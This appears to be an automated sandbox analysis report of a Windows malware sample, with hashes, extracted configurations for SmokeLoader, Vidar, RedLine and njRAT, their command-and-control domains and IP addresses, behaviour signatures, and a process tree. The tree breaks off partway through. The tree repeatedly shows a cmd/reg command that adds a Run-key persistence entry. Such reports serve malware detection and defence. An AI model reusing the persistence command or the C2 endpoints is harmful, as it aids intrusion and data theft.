Analysis

  • max time kernel
    159s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    06-09-2021 22:08

General

  • Target

    3a60e2f393e906944fc3f01e1e160a22.exe

  • Size

    201KB

  • MD5

    3a60e2f393e906944fc3f01e1e160a22

  • SHA1

    4350ffd3daf6c10d89c95b07bbfd67dbff452dc6

  • SHA256

    abd8f8f1a74e9588e563fc30dfcff31218d5d87c84b13a3ad618bed7f1994171

  • SHA512

    fc52c47bfc264eab3d7c63e6207911e522a2797b8d890f07d64b899d3cce02cf78a1ae8df09849240ccc0ac77dea9e2d4889eaaaf461ab1b052af3d2275b60f5

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fazanaharahe1.xyz/

http://xandelissane2.xyz/

http://ustiassosale3.xyz/

http://cytheriata4.xyz/

http://ggiergionard5.xyz/

http://rrelleynaniy6.store/

http://danniemusoa7.store/

http://nastanizab8.store/

http://onyokandis9.store/

http://dmunaavank10.store/

http://gilmandros11.site/

http://cusanthana12.site/

http://willietjeana13.site/

http://ximusokall14.site/

http://blodinetisha15.site/

http://urydiahadyss16.club/

http://glasamaddama17.club/

http://marlingarly18.club/

http://alluvianna19.club/

http://xandirkaniel20.club/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.4

Botnet

1002

C2

https://romkaxarit.tumblr.com/

Attributes
  • profile_id

    1002

Extracted

Family

redline

Botnet

@Ebalosgory

C2

77.83.175.169:11490

Extracted

Family

njrat

C2

62.33.159.162:5674

Mutex

26c50014115b430

Attributes
  • reg_key

    26c50014115b430

  • splitter

    @!#&^%$

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 19 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 38 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe
    "C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3792
    • C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe
      "C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1700
  • C:\Users\Admin\AppData\Local\Temp\41BD.exe
    C:\Users\Admin\AppData\Local\Temp\41BD.exe
    1⤵
    • Executes dropped EXE
    • Modifies system certificate store
    PID:3044
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 756
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3960
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 808
      2⤵
      • Program crash
      PID:4032
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 740
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3788
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 820
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1132
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 952
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2256
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 976
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2036
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1392
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3980
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1352
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:184
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1656
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1632
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1572
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2268
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1664
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3304
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1748
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3972
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1720
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:4052
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1352
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2248
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1640
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2532
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1796
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1356
  • C:\Users\Admin\AppData\Local\Temp\9AAB.exe
    C:\Users\Admin\AppData\Local\Temp\9AAB.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:3636
  • C:\Users\Admin\AppData\Local\Temp\EFC2.exe
    C:\Users\Admin\AppData\Local\Temp\EFC2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1876
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
        PID:5088
    • C:\Users\Admin\AppData\Local\Temp\F437.exe
      C:\Users\Admin\AppData\Local\Temp\F437.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Users\Admin\AppData\Local\Temp\F437.exe
        "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        2⤵
        • Executes dropped EXE
        PID:4044
      • C:\Users\Admin\AppData\Local\Temp\F437.exe
        "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        2⤵
        • Executes dropped EXE
        PID:3512
      • C:\Users\Admin\AppData\Local\Temp\F437.exe
        "C:\Users\Admin\AppData\Local\Temp\F437.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
        • C:\Users\Admin\AppData\Local\Temp\Miner.exe
          "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
          • C:\Users\Admin\AppData\Local\Temp\Miner.exe
            "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            4⤵
            • Executes dropped EXE
            PID:1432
          • C:\Users\Admin\AppData\Local\Temp\Miner.exe
            "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            4⤵
            • Executes dropped EXE
            PID:3980
          • C:\Users\Admin\AppData\Local\Temp\Miner.exe
            "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            4⤵
            • Executes dropped EXE
            PID:1148
          • C:\Users\Admin\AppData\Local\Temp\Miner.exe
            "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            4⤵
            • Executes dropped EXE
            PID:4068
          • C:\Users\Admin\AppData\Local\Temp\Miner.exe
            "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
            4⤵
            • Executes dropped EXE
            PID:3640
    • C:\Users\Admin\AppData\Local\Temp\FB5C.exe
      C:\Users\Admin\AppData\Local\Temp\FB5C.exe
      1⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:756
    • C:\Users\Admin\AppData\Local\Temp\FED8.exe
      C:\Users\Admin\AppData\Local\Temp\FED8.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe
        "C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4036
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3640
            • C:\Windows\SysWOW64\cmd.exe
              CMD /C CALL echo y
              5⤵
                PID:2040
            • C:\Windows\SysWOW64\reg.exe
              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
              4⤵
              • Adds Run key to start application
              PID:3512
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:908
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
              4⤵
                PID:3064
                • C:\Windows\SysWOW64\cmd.exe
                  CMD /C CALL echo y
                  5⤵
                    PID:3840
                • C:\Windows\SysWOW64\reg.exe
                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                  4⤵
                  • Adds Run key to start application
                  PID:1580
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                3⤵
                  PID:2692
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                    4⤵
                      PID:500
                      • C:\Windows\SysWOW64\cmd.exe
                        CMD /C CALL echo y
                        5⤵
                          PID:2060
                      • C:\Windows\SysWOW64\reg.exe
                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                        4⤵
                        • Adds Run key to start application
                        PID:1712
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                      3⤵
                        PID:1128
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                          4⤵
                            PID:3120
                            • C:\Windows\SysWOW64\cmd.exe
                              CMD /C CALL echo y
                              5⤵
                                PID:1772
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                              4⤵
                              • Adds Run key to start application
                              PID:3048
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                            3⤵
                              PID:4080
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                4⤵
                                  PID:3840
                                  • C:\Windows\SysWOW64\cmd.exe
                                    CMD /C CALL echo y
                                    5⤵
                                      PID:1248
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                    4⤵
                                    • Adds Run key to start application
                                    PID:908
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                  3⤵
                                    PID:1216
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                      4⤵
                                        PID:3312
                                        • C:\Windows\SysWOW64\cmd.exe
                                          CMD /C CALL echo y
                                          5⤵
                                            PID:3908
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                          4⤵
                                          • Adds Run key to start application
                                          PID:3120
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                        3⤵
                                          PID:2636
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                            4⤵
                                              PID:4080
                                              • C:\Windows\SysWOW64\cmd.exe
                                                CMD /C CALL echo y
                                                5⤵
                                                  PID:2800
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                4⤵
                                                • Adds Run key to start application
                                                PID:3812
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                              3⤵
                                                PID:2476
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                  4⤵
                                                    PID:2256
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      CMD /C CALL echo y
                                                      5⤵
                                                        PID:2040
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                      4⤵
                                                      • Adds Run key to start application
                                                      PID:3692
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                    3⤵
                                                      PID:2564
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                        4⤵
                                                          PID:1248
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            CMD /C CALL echo y
                                                            5⤵
                                                              PID:908
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                            4⤵
                                                            • Adds Run key to start application
                                                            PID:3312
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                          3⤵
                                                            PID:3564
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                              4⤵
                                                                PID:2628
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  CMD /C CALL echo y
                                                                  5⤵
                                                                    PID:2636
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                  4⤵
                                                                  • Adds Run key to start application
                                                                  PID:1580
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                3⤵
                                                                  PID:196
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                    4⤵
                                                                      PID:3260
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        CMD /C CALL echo y
                                                                        5⤵
                                                                          PID:3808
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                        4⤵
                                                                        • Adds Run key to start application
                                                                        PID:2884
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                      3⤵
                                                                        PID:3828
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                          4⤵
                                                                            PID:2712
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              CMD /C CALL echo y
                                                                              5⤵
                                                                                PID:1100
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                              4⤵
                                                                              • Adds Run key to start application
                                                                              PID:704
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                            3⤵
                                                                              PID:3472
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                4⤵
                                                                                  PID:3340
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    CMD /C CALL echo y
                                                                                    5⤵
                                                                                      PID:3048
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                    4⤵
                                                                                    • Adds Run key to start application
                                                                                    PID:3308
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                  3⤵
                                                                                    PID:3536
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                      4⤵
                                                                                        PID:3312
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          CMD /C CALL echo y
                                                                                          5⤵
                                                                                            PID:4044
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                          4⤵
                                                                                          • Adds Run key to start application
                                                                                          PID:1376
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                        3⤵
                                                                                          PID:3556
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                            4⤵
                                                                                              PID:2628
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                CMD /C CALL echo y
                                                                                                5⤵
                                                                                                  PID:4068
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                4⤵
                                                                                                • Adds Run key to start application
                                                                                                PID:2636
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                              3⤵
                                                                                                PID:2084
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                  4⤵
                                                                                                  • Adds Run key to start application
                                                                                                  PID:2256
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                  4⤵
                                                                                                    PID:3692
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      CMD /C CALL echo y
                                                                                                      5⤵
                                                                                                        PID:3120
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                    3⤵
                                                                                                      PID:2292
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                        4⤵
                                                                                                          PID:648
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            CMD /C CALL echo y
                                                                                                            5⤵
                                                                                                              PID:1344
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                            4⤵
                                                                                                            • Adds Run key to start application
                                                                                                            PID:2508
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                          3⤵
                                                                                                            PID:504
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                              4⤵
                                                                                                                PID:3912
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  CMD /C CALL echo y
                                                                                                                  5⤵
                                                                                                                    PID:1612
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                  4⤵
                                                                                                                  • Adds Run key to start application
                                                                                                                  PID:2980
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                3⤵
                                                                                                                  PID:3472
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                    4⤵
                                                                                                                      PID:3080
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        CMD /C CALL echo y
                                                                                                                        5⤵
                                                                                                                          PID:2236
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                        4⤵
                                                                                                                        • Adds Run key to start application
                                                                                                                        PID:2564
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
